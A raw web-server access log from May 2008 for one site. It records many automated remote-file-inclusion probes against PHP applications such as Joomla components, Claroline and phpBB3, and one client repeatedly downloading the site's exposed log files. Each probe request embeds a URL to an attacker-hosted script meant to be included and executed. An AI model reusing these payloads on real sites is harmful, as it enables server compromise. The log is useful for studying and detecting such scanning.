67.19.197.98 - - [29/May/2008:12:41:15 -0700] "GET //phphtml.php?htmlclass_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.19.197.98 - - [29/May/2008:12:41:15 -0700] "GET /logs//phphtml.php?htmlclass_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
60.48.185.93 - - [29/May/2008:12:42:21 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.48.185.93 - - [29/May/2008:12:42:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.48.185.93 - - [29/May/2008:12:42:22 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:42:32 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:42:32 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:42:38 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:12:43:34 -0700] "GET /logs/index.php?redir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:12:43:37 -0700] "GET /index.php?redir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:12:43:43 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:12:43:44 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:43:46 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:43:46 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:43:49 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:43:51 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:43:51 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:43:54 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:44:50 -0700] "GET /logs/access_080106.log/components/com_joomlaboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.209.176 - - [29/May/2008:12:44:56 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.209.176 - - [29/May/2008:12:44:57 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.62.80.134 - - [29/May/2008:12:45:07 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
209.62.80.134 - - [29/May/2008:12:45:07 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:12:45:21 -0700] "GET /logs//mcf.php?content=http://www.zeroboss.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:45:33 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:45:34 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:45:34 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:46:53 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:46:57 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:46:58 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:46:59 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:47:18 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:47:18 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.7.65.157 - - [29/May/2008:12:47:19 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.7.65.157 - - [29/May/2008:12:47:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:47:24 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:47:38 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 242037 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:47:38 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 255777 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:47:55 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 297728 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:47:56 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 304128 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:01 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 307200 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:01 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 256961 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:01 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 251073 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:01 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 231873 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
66.230.197.245 - - [29/May/2008:12:48:03 -0700] "GET /logs/access.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/May/2008:12:48:03 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:05 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 312832 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:05 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 290048 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:08 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 305920 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:10 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 315648 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:48:12 -0700] "GET /logs/access_080201.log/path/index.php?pagina=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:48:12 -0700] "GET /path/index.php?pagina=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:48:12 -0700] "GET /logs/path/index.php?pagina=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:19 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 314624 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:20 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 302336 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:12:48:26 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:27 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 231873 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:27 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 231873 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:27 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 237681 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:28 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 314624 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:32 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 318717 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:48:35 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 274432 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:12:48:35 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:48:41 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:48:41 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:48:41 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:02 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 373760 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:04 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 439296 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:06 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 317440 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:15 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 276736 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:16 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 291840 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:19 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 387840 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:25 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 407808 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:12:49:25 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:12:49:25 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:26 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 272640 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:27 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 360960 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:49:59 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 372224 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:50:10 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:50:20 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 270336 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:50:25 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 511232 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:50:27 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 346368 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:50:45 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:50:48 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 386560 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:12:51:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:12:51:00 -0700] "GET /modules/My_eGallery/index.php?basepath=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:51:01 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 387072 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:51:02 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:51:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:12:51:07 -0700] "GET /logs/errors.php?error=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:12:51:08 -0700] "GET /errors.php?error=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:12:51:10 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:12:51:10 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:12:51:10 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:51:19 -0700] "GET /logs/access.log///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:51:22 -0700] "GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:51:22 -0700] "GET /logs///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:51:28 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:51:28 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
78.82.245.21 - - [29/May/2008:12:51:42 -0700] "GET /logs//menu.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.82.245.21 - - [29/May/2008:12:51:42 -0700] "GET //menu.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:51:45 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 513536 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:51:50 -0700] "GET /logs/access_071225.log/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:52:00 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:52:03 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:52:13 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:52:27 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:52:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:52:36 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 388864 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:12:52:40 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:12:52:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:52:51 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:52:56 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:53:00 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 257473 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:12:53:12 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
60.48.185.93 - - [29/May/2008:12:53:15 -0700] "GET /logs/access_071230.log/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:53:25 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:53:32 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:53:34 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:53:36 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:53:37 -0700] "GET //index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://infects1337.t35.com/TT??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:53:38 -0700] "GET /logs//index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.106.255.146 - - [29/May/2008:12:53:38 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 228969 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:53:43 -0700] "GET /logs/access.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:53:43 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:12:53:49 -0700] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:53:49 -0700] "GET /logs/access_080327.log/components/com_simpleboard/file_upload.php?sbp=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:12:53:50 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:12:53:50 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com" 85.106.2